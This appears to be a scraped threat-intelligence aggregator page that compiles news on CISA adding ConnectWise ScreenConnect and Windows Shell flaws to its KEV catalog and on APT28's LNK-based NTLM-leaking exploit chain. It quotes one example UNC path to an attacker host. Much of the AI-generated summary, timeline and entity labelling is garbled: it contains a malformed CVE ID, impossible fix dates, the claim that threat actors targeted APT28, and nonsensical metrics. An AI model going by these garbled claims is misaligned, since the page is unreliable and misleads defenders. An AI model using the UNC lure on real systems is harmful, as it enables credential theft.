INSPECTING ARCHIVED INTELLIGENCE (OUTDATED VERSION).
Actively Exploited Windows Flaws Found in ConnectWise and KEV
| 2026-04-29 08:46 CRITICAL HIGHExecutive Summary AI-generated
The vulnerability exploited by the Russian hacking group APT28 in attacks targeting Ukraine and E.U. countries since December 2025 is a zero-day flaw that has been linked to an incomplete patch for CVE-2026-21510, which was also used as a zero-day exploit alongside CVE-2026-21513 by the same threat actor. This vulnerability has now been added to Microsoft Windows Shell and ConnectWise ScreenConnect flaws, making it a known exploited vulnerability in both products.
Technical Mitigations AI-generated
* Implement secure file paths: Ensure that all file paths on the system are properly restricted to prevent attackers from accessing sensitive areas of the system. This can be achieved by using a combination of access control lists (ACLs), permissions, and network security groups.
* Regularly update Windows and ConnectWise ScreenConnect: Keep Microsoft Windows and ConnectWise ScreenConnect up-to-date with the latest security patches and updates to ensure that any known vulnerabilities are patched before they can be exploited.
* Use a secure authentication mechanism: Implement strong authentication mechanisms, such as multi-factor authentication (MFA), to prevent unauthorized access to sensitive areas of the system. This can help reduce the risk of authentication bypass attacks.
* Monitor network traffic and logs: Regularly monitor network traffic and log files for suspicious activity that may indicate an attack exploiting CVE-2024-1708 or CVE-2026-32202. This can help identify potential security threats early on.
* Implement a web application firewall (WAF): Consider implementing a WAF to protect against common web attacks, such as SQL injection and cross-site scripting (XSS). A well-configured WAF can help prevent attackers from exploiting vulnerabilities like CVE-2024-1708 or CVE-2026-32202.
Technical Observables
Intelligence Metadata
Actors / Malware / CVEs / Campaigns
APT28APT28
CVE-2024-1708CVE-2024-1708
CVE-2026-32202CVE-2026-32202
CVE-2026-21510CVE-2026-21510
CVE-2026-21513CVE-2026-21513
CVE-2024-1709CVE-2024-1709
Target & Sectors
RU
CN
UA
Incident Timeline
February 2024
Threat actors used a vulnerability in Microsoft Windows Shell to exploit Actively Exploited ConnectWise and Windows Flaws.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-32202
(Fixed in February 2024)
CVE-2026-32202
(CVSS score: 4.3) -
infrastructure
4.3
(Fixed in February 2024)
CVE-2026-32202
(CVSS score: 4.3) -
organisation
CVE-2026
(Fixed in February 2024)
CVE-2026-32202
(CVSS score: 4.3) -
general_metric
4.3 score
(Fixed in February 2024)
CVE-2026-32202
(CVSS score: 4.3) -
infrastructure
Windows
A protection mechanism failure vulnerability in Microsoft Windows Shell that could allow an unauthorized attacker to perform spoofing over a network.
organisation
Microsoft Windows Shell
A protection mechanism failure vulnerability in Microsoft Windows Shell that could allow an unauthorized attacker to perform spoofing over a network.
February 22, 2024
Threat actors exploited Actively Exploited ConnectWise and Windows vulnerabilities to target KEV systems.
Click on any entity below to view its context and source!
vulnerability
CVE-2024-1709
It's worth noting that CISA
added
CVE-2024-1709 to the KEV catalog on February 22, 2024.
December 2025
Threat actors used a malicious Windows Shortcut (LNK) file to exploit CVE-2024-1709, a critical authentication bypass vulnerability in Windows.
Click on any entity below to view its context and source!
source_region
Russian Federation
Although Microsoft has not disclosed the nature of the attacks weaponizing the flaw, Akamai said the vulnerability stemmed from an incomplete patch for CVE-2026-21510, which was exploited as a zero-day alongside CVE-2026-21513 by the Russian hacking group APT28 in attacks targeting Ukraine and E.U. countries since December 2025.
target_region
Ukraine
Although Microsoft has not disclosed the nature of the attacks weaponizing the flaw, Akamai said the vulnerability stemmed from an incomplete patch for CVE-2026-21510, which was exploited as a zero-day alongside CVE-2026-21513 by the Russian hacking group APT28 in attacks targeting Ukraine and E.U. countries since December 2025.
CVE-2026-21510 Exploitation
The campaign, targeting Ukraine and E.U. nations in December 2025, leverages a malicious Windows Shortcut (LNK) file to exploit the two vulnerabilities, effectively bypassing Microsoft Defender SmartScreen and enabling attacker-controlled code to be executed.
vulnerability
CVE-2026-21510
Although Microsoft has not disclosed the nature of the attacks weaponizing the flaw, Akamai said the vulnerability stemmed from an incomplete patch for CVE-2026-21510, which was exploited as a zero-day alongside CVE-2026-21513 by the Russian hacking group APT28 in attacks targeting Ukraine and E.U. countries since December 2025.
CVE-2026-21510 Exploitation
The campaign, targeting Ukraine and E.U. nations in December 2025, leverages a malicious Windows Shortcut (LNK) file to exploit the two vulnerabilities, effectively bypassing Microsoft Defender SmartScreen and enabling attacker-controlled code to be executed.
vulnerability
CVE-2026-21513
Although Microsoft has not disclosed the nature of the attacks weaponizing the flaw, Akamai said the vulnerability stemmed from an incomplete patch for CVE-2026-21510, which was exploited as a zero-day alongside CVE-2026-21513 by the Russian hacking group APT28 in attacks targeting Ukraine and E.U. countries since December 2025.
organisation
Akamai
Although Microsoft has not disclosed the nature of the attacks weaponizing the flaw, Akamai said the vulnerability stemmed from an incomplete patch for CVE-2026-21510, which was exploited as a zero-day alongside CVE-2026-21513 by the Russian hacking group APT28 in attacks targeting Ukraine and E.U. countries since December 2025.
threat_actor
APT28
Although Microsoft has not disclosed the nature of the attacks weaponizing the flaw, Akamai said the vulnerability stemmed from an incomplete patch for CVE-2026-21510, which was exploited as a zero-day alongside CVE-2026-21513 by the Russian hacking group APT28 in attacks targeting Ukraine and E.U. countries since December 2025.
general_metric
21513 CVE-2026
Although Microsoft has not disclosed the nature of the attacks weaponizing the flaw, Akamai said the vulnerability stemmed from an incomplete patch for CVE-2026-21510, which was exploited as a zero-day alongside CVE-2026-21513 by the Russian hacking group APT28 in attacks targeting Ukraine and E.U. countries since December 2025.
infrastructure
Windows
CVE-2026-21510 Exploitation
The campaign, targeting Ukraine and E.U. nations in December 2025, leverages a malicious Windows Shortcut (LNK) file to exploit the two vulnerabilities, effectively bypassing Microsoft Defender SmartScreen and enabling attacker-controlled code to be executed.
organisation
CVE-2026-21510 Exploitation
The campaign
CVE-2026-21510 Exploitation
The campaign, targeting Ukraine and E.U. nations in December 2025, leverages a malicious Windows Shortcut (LNK) file to exploit the two vulnerabilities, effectively bypassing Microsoft Defender SmartScreen and enabling attacker-controlled code to be executed.
organisation
Windows Shortcut
CVE-2026-21510 Exploitation
The campaign, targeting Ukraine and E.U. nations in December 2025, leverages a malicious Windows Shortcut (LNK) file to exploit the two vulnerabilities, effectively bypassing Microsoft Defender SmartScreen and enabling attacker-controlled code to be executed.
organisation
CVE-2024-1709
Attacks exploiting
CVE-2024-1708
, on the other hand, have been chained with CVE-2024-1709 (CVSS score: 10.0), a
critical authentication bypass
vulnerability, by
multiple threat actors
over the years.
January 2026
Threat actors used CVE-2026-21513 to target APT28.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-21513
It's worth noting that the abuse of CVE-2026-21513 was also
flagged
by the web infrastructure and security company early last month, linking it to APT28 after unearthing a malicious artifact in January 2026.
threat_actor
APT28
It's worth noting that the abuse of CVE-2026-21513 was also
flagged
by the web infrastructure and security company early last month, linking it to APT28 after unearthing a malicious artifact in January 2026.
February 2026
Threat actors used a vulnerability in ConnectWise and Windows to exploit CVE-2026-21513, allowing them to authenticate to an attacker's server without user interaction.
Click on any entity below to view its context and source!
organisation
CVE-2026-21513
(Fixed by Microsoft in
February 2026
)
CVE-2026-21513
(CVSS score: 8.8) -
general_metric
8.8 latter
(Fixed by Microsoft in
February 2026
)
CVE-2026-21513
(CVSS score: 8.8) -
infrastructure
8.8
(Fixed by Microsoft in
February 2026
)
CVE-2026-21513
(CVSS score: 8.8) -
organisation
Akamai
Akamai said the February 2026 patch, while mitigating the remote code execution risk by triggering a SmartScreen check of the CPL file's digital signature and origin zone, still allowed the victim machine to authenticate to the attacker's server and automatically fetch the CPL file by resolving the Universal Naming Convention (
UNC
) path and initiating an SMB connection without requiring user interaction.
tactic
Remote Code Execution
Akamai said the February 2026 patch, while mitigating the remote code execution risk by triggering a SmartScreen check of the CPL file's digital signature and origin zone, still allowed the victim machine to authenticate to the attacker's server and automatically fetch the CPL file by resolving the Universal Naming Convention (
UNC
) path and initiating an SMB connection without requiring user interaction.
organisation
SmartScreen
Akamai said the February 2026 patch, while mitigating the remote code execution risk by triggering a SmartScreen check of the CPL file's digital signature and origin zone, still allowed the victim machine to authenticate to the attacker's server and automatically fetch the CPL file by resolving the Universal Naming Convention (
UNC
) path and initiating an SMB connection without requiring user interaction.
organisation
CPL
Akamai said the February 2026 patch, while mitigating the remote code execution risk by triggering a SmartScreen check of the CPL file's digital signature and origin zone, still allowed the victim machine to authenticate to the attacker's server and automatically fetch the CPL file by resolving the Universal Naming Convention (
UNC
) path and initiating an SMB connection without requiring user interaction.
organisation
SMB
Akamai said the February 2026 patch, while mitigating the remote code execution risk by triggering a SmartScreen check of the CPL file's digital signature and origin zone, still allowed the victim machine to authenticate to the attacker's server and automatically fetch the CPL file by resolving the Universal Naming Convention (
UNC
) path and initiating an SMB connection without requiring user interaction.
2026/03/29
Threat actors used CVE-2026-21513 to target ConnectWise systems.
Click on any entity below to view its context and source!
vulnerability
CVE-2026-21513
It's worth noting that the abuse of CVE-2026-21513 was also
flagged
by the web infrastructure and security company early last month, linking it to APT28 after unearthing a malicious artifact in January 2026.
threat_actor
APT28
It's worth noting that the abuse of CVE-2026-21513 was also
flagged
by the web infrastructure and security company early last month, linking it to APT28 after unearthing a malicious artifact in January 2026.
April 2026
The incident involved the addition of CVE-2026-32202 to the KEV catalog by CISA, which was followed by Microsoft's update acknowledging that the flaw had been actively exploited.
Click on any entity below to view its context and source!
organisation
KEV
The addition of CVE-2026-32202 to the KEV catalog comes a day after Microsoft
updated its advisory
for the flaw to acknowledge it had come under active exploitation.
organisation
Microsoft
The addition of CVE-2026-32202 to the KEV catalog comes a day after Microsoft
updated its advisory
for the flaw to acknowledge it had come under active exploitation.
April 14
Threat actors used a vulnerability in ConnectWise to target Microsoft Windows.
Click on any entity below to view its context and source!
organisation
CVSS
"
On April 27, 2026, Microsoft said it rectified the "Exploitability Index, Exploited flag, and CVSS vector" as they were incorrect when they were published on April 14.
April 27, 2026
Threat actors used a vulnerability in ConnectWise to target Windows systems.
Click on any entity below to view its context and source!
organisation
CVSS
"
On April 27, 2026, Microsoft said it rectified the "Exploitability Index, Exploited flag, and CVSS vector" as they were incorrect when they were published on April 14.
Apr 28, 2026
Threat actors used a vulnerability in ConnectWise to target Windows systems.
Apr 29, 2026
Threat actors exploited the Actively Exploited ConnectWise vulnerability to target Windows systems.
2026/04/29
Microsoft Windows Shell flaw CVE-2026-32202 exploited by APT28.
Click on any entity below to view its context and source!
threat_actor
APT28
The latter has been weaponized by a Russian nation-state group tracked as
APT28
(aka Fancy Bear, Forest Blizzard, GruesomeLarch, and Pawn Storm) along with CVE-2026-21513 as part of an exploit chain -
CVE-2026-21510
(CVSS score: 8.8) -
"APT28 leverages the Windows Shell namespace parsing mechanism to load a dynamic-link library (DLL) from a remote server using a UNC path," Dahan
explained
.
organisation
GruesomeLarch
The latter has been weaponized by a Russian nation-state group tracked as
APT28
(aka Fancy Bear, Forest Blizzard, GruesomeLarch, and Pawn Storm) along with CVE-2026-21513 as part of an exploit chain -
CVE-2026-21510
(CVSS score: 8.8) -
infrastructure
Windows
"APT28 leverages the Windows Shell namespace parsing mechanism to load a dynamic-link library (DLL) from a remote server using a UNC path," Dahan
explained
.
The second flaw added to the catalog is a Windows Shell Spoofing vulnerability tracked as CVE-2026-32202.
"Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network," Microsoft
noted
in an alert.
CISA Adds Actively Exploited ConnectWise and Windows Flaws to KEV.
Ravie Lakshmanan
Apr 29, 2026
Vulnerability / Network Security
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday
added
two security flaws impacting ConnectWise ScreenConnect and Microsoft Windows to its Known Exploited Vulnerabilities (
KEV
) catalog, based on evidence of active exploitation.
U.S. CISA adds Microsoft Windows Shell and ConnectWise ScreenConnect flaws to its Known Exploited Vulnerabilities catalog.
U.S. CISA adds Microsoft Windows Shell and ConnectWise ScreenConnect flaws to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Windows Shell and ConnectWise ScreenConnect flaws to its Known Exploited Vulnerabilities catalog.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
Windows Shell and ConnectWise ScreenConnect flaws to its
Known Exploited Vulnerabilities (KEV) catalog
.
Microsoft Windows Protection Mechanism Failure Vulnerability
CVE-2024-02-21 is a path traversal vulnerability affecting ConnectWise ScreenConnect versions 23.9.7 and earlier.
Microsoft Confirms Active Exploitation of Windows Shell CVE-2026-32202.
Ravie Lakshmanan
Apr 28, 2026
Vulnerability / Threat Intelligence
Microsoft on Monday revised its advisory for a now-patched, high-severity security flaw impacting Windows Shell to acknowledge that it has been actively exploited in the wild.
A protection mechanism failure in Windows Shell that allows an unauthorized attacker to bypass a security feature over a network.
"When that path is a UNC path (like '\\attacker.com\share\payload.cpl'), Windows initiates an SMB connection to the attacker's server," Dahan said.
organisation
DLL
"APT28 leverages the Windows Shell namespace parsing mechanism to load a dynamic-link library (DLL) from a remote server using a UNC path," Dahan
explained
.
organisation
UNC
"APT28 leverages the Windows Shell namespace parsing mechanism to load a dynamic-link library (DLL) from a remote server using a UNC path," Dahan
explained
.
organisation
Microsoft
"Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network," Microsoft
noted
in an alert.
infrastructure
23.9.7
Microsoft Windows Protection Mechanism Failure Vulnerability
CVE-2024-02-21 is a path traversal vulnerability affecting ConnectWise ScreenConnect versions 23.9.7 and earlier.
organisation
ConnectWise ScreenConnect
Microsoft Windows Protection Mechanism Failure Vulnerability
CVE-2024-02-21 is a path traversal vulnerability affecting ConnectWise ScreenConnect versions 23.9.7 and earlier.
organisation
CVSS
Below are the flaws added to the catalog:
CVE-2024-1708
(CVSS score of 8.4) ConnectWise ScreenConnect Path Traversal Vulnerability
CVE-2026-32202
(CVSS score of 4.3)
organisation
NTLM
"This server message block (SMB) connection triggers an automatic NTLM authentication handshake, sending the victim's Net-NTLMv2 hash to the attacker, which can later be used for NTLM relay attacks and offline cracking.
organisation
LNK
This gap between path resolution and trust verification left a zero-click credential theft vector via auto-parsed LNK files."
May 12, 2026
Threat actors used a vulnerability in ConnectWise to exploit Windows flaws.
Click on any entity below to view its context and source!
attribution
Federal Civilian Executive Branch
Federal Civilian Executive Branch (FCEB) agencies are required to apply the necessary fixes by May 12, 2026, to secure their networks.
attribution
FCEB
Federal Civilian Executive Branch (FCEB) agencies are required to apply the necessary fixes by May 12, 2026, to secure their networks.
Tactical Metrics
Metrics
infrastructure
Windows
Affected Product
Click for context!
A protection mechanism failure vulnerability in Microsoft Windows Shell that could allow an unauthorized attacker to perform spoofing over a network.
CISA Adds Actively Exploited ConnectWise and Windows Flaws to KEV.
Ravie Lakshmanan
Apr 29, 2026
Vulnerability / Network Security
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Tuesday
added
two security flaws impacting ConnectWise ScreenConnect and Microsoft Windows to its Known Exploited Vulnerabilities (
KEV
) catalog, based on evidence of active exploitation.
The second flaw added to the catalog is a Windows Shell Spoofing vulnerability tracked as CVE-2026-32202.
U.S. CISA adds Microsoft Windows Shell and ConnectWise ScreenConnect flaws to its Known Exploited Vulnerabilities catalog.
U.S. CISA adds Microsoft Windows Shell and ConnectWise ScreenConnect flaws to its Known Exploited Vulnerabilities catalog
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Windows Shell and ConnectWise ScreenConnect flaws to its Known Exploited Vulnerabilities catalog.
The U.S. Cybersecurity and Infrastructure Security Agency (CISA)
added
Windows Shell and ConnectWise ScreenConnect flaws to its
Known Exploited Vulnerabilities (KEV) catalog
.
Microsoft Windows Protection Mechanism Failure Vulnerability
CVE-2024-02-21 is a path traversal vulnerability affecting ConnectWise ScreenConnect versions 23.9.7 and earlier.
CVE-2026-21510 Exploitation
The campaign, targeting Ukraine and E.U. nations in December 2025, leverages a malicious Windows Shortcut (LNK) file to exploit the two vulnerabilities, effectively bypassing Microsoft Defender SmartScreen and enabling attacker-controlled code to be executed.
"Protection mechanism failure in Windows Shell allows an unauthorized attacker to perform spoofing over a network," Microsoft
noted
in an alert.
Microsoft Confirms Active Exploitation of Windows Shell CVE-2026-32202.
Ravie Lakshmanan
Apr 28, 2026
Vulnerability / Threat Intelligence
Microsoft on Monday revised its advisory for a now-patched, high-severity security flaw impacting Windows Shell to acknowledge that it has been actively exploited in the wild.
A protection mechanism failure in Windows Shell that allows an unauthorized attacker to bypass a security feature over a network.
"APT28 leverages the Windows Shell namespace parsing mechanism to load a dynamic-link library (DLL) from a remote server using a UNC path," Dahan
explained
.
"When that path is a UNC path (like '\\attacker.com\share\payload.cpl'), Windows initiates an SMB connection to the attacker's server," Dahan said.
Metrics
infrastructure
4.3
Software Version
(Fixed in February 2024)
CVE-2026-32202
(CVSS score: 4.3) -
Metrics
infrastructure
23.9.7
Software Version
Microsoft Windows Protection Mechanism Failure Vulnerability
CVE-2024-02-21 is a path traversal vulnerability affecting ConnectWise ScreenConnect versions 23.9.7 and earlier.
Metrics
infrastructure
8.8
Software Version
(Fixed by Microsoft in
February 2026
)
CVE-2026-21513
(CVSS score: 8.8) -
Intelligence Sources
The Hacker News
2026-04-29
Security Affairs
2026-04-29
The Hacker News
2026-04-28
Unpublish from Social Media?
Are you sure you want to delete this podcast video from all synchronized social networks (YouTube, Facebook, Threads)?
Important:
Due to Meta API restrictions, Instagram Reels cannot be deleted automatically via API by third-party apps.
View Profile to Delete Manually
View Profile to Delete Manually
Tactical Intelligence
Report Intelligence Issue
Podcast Options
Generate
Incident Version History
CURRENT VERSION
Last Updated: 2026-05-01T12:01
Comprehensive Tactical Telemetry
Highly Correlated Entities
21x
organisation
Identified Entity
Akamai
entity
16x
attribution
Attributing Entity
CISA
authority
14x
timeline
Temporal Reference
December 2025
date
5x
vulnerability
Exploited CVE
CVE-2026-21510
cve
3x
target region
Target Country
Ukraine
country
3x
tactic
Cyber Operation Type
Ransomware
tactic
3x
infrastructure
Software Version
4.3
version
2x
tactic
MITRE ATT&CK Technique
T1588.006 - Vulnerabilities
technique
2x
general metric
Apr
29
apr
2x
vulnerability
CVSS Score
8
score
Contextual Telemetry
Context Block
8 METRICS
source region
Origin Country
Russian Federation
country
threat actor
APT Group
APT28
actor
general metric
Cve-2026
21,513
cve-2026
infrastructure
Affected Product
Windows
software
general metric
Vulnerabilities
8
vulnerabilities
general metric
Score
4
score
general metric
Spoofing Vulnerability
32,202
spoofing vulnerability
general metric
Latter
9
latter
Click on any entity below to view its context in the main text!
Selective Unpublish
Selecciona las redes de las que quieres eliminar esta publicación. El sistema intentará borrar el post real de la API y limpiará la base de datos para que puedas volver a lanzarlo.
By navigating this website, you accept the use of strictly necessary technical cookies for session security and basic platform functionality. We do not use tracking or advertising cookies.
Read our Privacy Policy.